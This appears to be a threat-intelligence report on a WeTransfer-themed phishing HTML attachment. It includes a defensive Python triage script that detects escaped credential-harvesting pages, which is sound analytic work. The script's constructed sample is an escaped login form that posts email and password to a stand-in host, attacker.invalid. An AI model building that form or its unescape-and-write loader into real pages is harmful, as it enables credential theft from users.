Malicious Spam Campaign Delivers Static Phishing Page
October 2020 by Infoblox Inc
On 20 September, Infoblox observed a malicious spam (malspam) campaign delivering an HTML attachment built to phish for credentials. While the threat actor(s) used generic lures in their emails, the HTML file specifically impersonated WeTransfer, a file-sharing service.
2. Customer Impact
Threat actors used a malicious HTML file in this campaign that is not related to any family of malware that Infoblox is aware of. The file harvests and exfiltrates WeTransfer credentials.
3. Campaign Analysis
In this campaign, threat actors sent victims an email with the subject "Request for Quotation-Urgent!!!". The message body was empty, but the email carried an HTML file attachment named "order - Copy.html".
4. Attack Chain
The HTML attachment embeds a second, escaped HTML page as a string in its contents. When the victim opens the attachment, script in the outer page decodes (unescapes) that string and writes it into the document. The resulting page tells the user they are viewing a secure document and must log in to see its contents, presenting a form that mimics the WeTransfer login. When the user enters credentials and submits the form, an iframe embedded in the second page collects them and posts them to an attacker-controlled URL. If the login attempt fails, the page tells the user that their credentials are invalid.
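A triage script for attachments of this kind, added here as an example (it is not Infoblox tooling or code from the campaign): it unpacks the escaped layer(s) the way the attachment's own script would, then inspects every layer for the combination described above, a password field plus a POST form whose action points at a non-WeTransfer host, with a hidden iframe as the form target as a secondary signal. The sample attachment, the attacker.invalid URL and the field names are constructed for illustration, not indicators from the campaign.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Constructed sample that mimics the described attachment: the outer page holds
# an escaped second page that a script unpacks at load time. The URL and field
# names are placeholders for this example, not indicators from the campaign.
ESCAPED_PAYLOAD = (
    "%3Cform%20method%3D%22POST%22%20action%3D%22https%3A//attacker.invalid/"
    "collect.php%22%20target%3D%22sink%22%3E"
    "%3Cinput%20name%3D%22email%22%3E"
    "%3Cinput%20name%3D%22password%22%20type%3D%22password%22%3E%3C/form%3E"
    "%3Ciframe%20name%3D%22sink%22%20style%3D%22display%3Anone%22%3E%3C/iframe%3E"
)
SAMPLE_ATTACHMENT = (
    "<html><head><title>WeTransfer - Secure Document</title></head><body>\n"
    "<script>document.write(unescape('" + ESCAPED_PAYLOAD + "'));</script>\n"
    "</body></html>\n"
)

# Common unpacker idioms in such attachments: unescape('...') / decodeURIComponent("...")
UNPACK_RE = re.compile(
    r"""(?:unescape|decodeURIComponent)\(\s*(?:'([^']*)'|"([^"]*)")\s*\)""", re.S
)


def js_unescape(s: str) -> str:
    """Decode a JavaScript escape()-style string: %uXXXX units first, then %XX."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)


def unpack_layers(html: str, max_depth: int = 5) -> list:
    """Return the original page plus every page it unpacks, following nested layers."""
    layers, frontier = [html], [html]
    for _ in range(max_depth):
        nxt = []
        for page in frontier:
            for single, double in UNPACK_RE.findall(page):
                decoded = js_unescape(single or double)
                if decoded and decoded not in layers:
                    layers.append(decoded)
                    nxt.append(decoded)
        if not nxt:
            break
        frontier = nxt
    return layers


class SinkParser(HTMLParser):
    """Collects form actions, iframes and password fields from one page layer."""

    def __init__(self):
        super().__init__()
        self.forms, self.iframes, self.password_fields = [], [], 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "",
                               "method": (a.get("method") or "GET").upper(),
                               "target": a.get("target") or ""})
        elif tag == "iframe":
            style = (a.get("style") or "").replace(" ", "")
            self.iframes.append({"name": a.get("name") or "",
                                 "hidden": "display:none" in style})
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1


def triage(html: str, brand_domain: str = "wetransfer.com") -> dict:
    """Flag a credential-harvesting page: password field plus POST to a non-brand host."""
    layers = unpack_layers(html)
    forms, iframes, pw = [], [], 0
    for page in layers:
        p = SinkParser()
        p.feed(page)
        forms += p.forms
        iframes += p.iframes
        pw += p.password_fields
    hidden_targets = {f["name"] for f in iframes if f["hidden"] and f["name"]}
    exfil = []
    for f in forms:
        host = urlparse(f["action"]).hostname or ""
        on_brand = host == brand_domain or host.endswith("." + brand_domain)
        if f["method"] == "POST" and host and not on_brand:
            exfil.append(f["action"])
    return {
        "layers": len(layers),
        "password_fields": pw,
        "exfil_urls": exfil,
        "posts_into_hidden_iframe": any(f["target"] in hidden_targets for f in forms),
        "suspicious": bool(exfil) and pw > 0,
    }


if __name__ == "__main__":
    print(triage(SAMPLE_ATTACHMENT))
```

The outer layer is parsed too, so a page that puts the form in clear text is caught the same way; script bodies are treated as data by the parser, so the escaped copy inside the script is not double-counted. Any reported exfil URL is the value an analyst would hand to the blocking and takedown process.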
5. Vulnerabilities and Mitigation
This malspam campaign relies solely on social engineering tactics to persuade the victim into revealing their credentials. As such, Infoblox recommends the following precautions to reduce the possibility of compromise:
• Regularly train users to be aware of potential phishing efforts and how to handle them appropriately.
• Always be suspicious of vague or empty emails, especially if there is a prompt to open an attachment or click on a link.
• Be aware of an attachment’s file type, and never open files that could be a script (.vbs, .cmd, .bat), an internet shortcut file, an HTML file such as the one used in this campaign, or a compressed archive. Compressed archives are a known method for evading detection based on file hashes and signatures; threat actors use them to mask the real malicious file and to get around email service restrictions on attachment file types.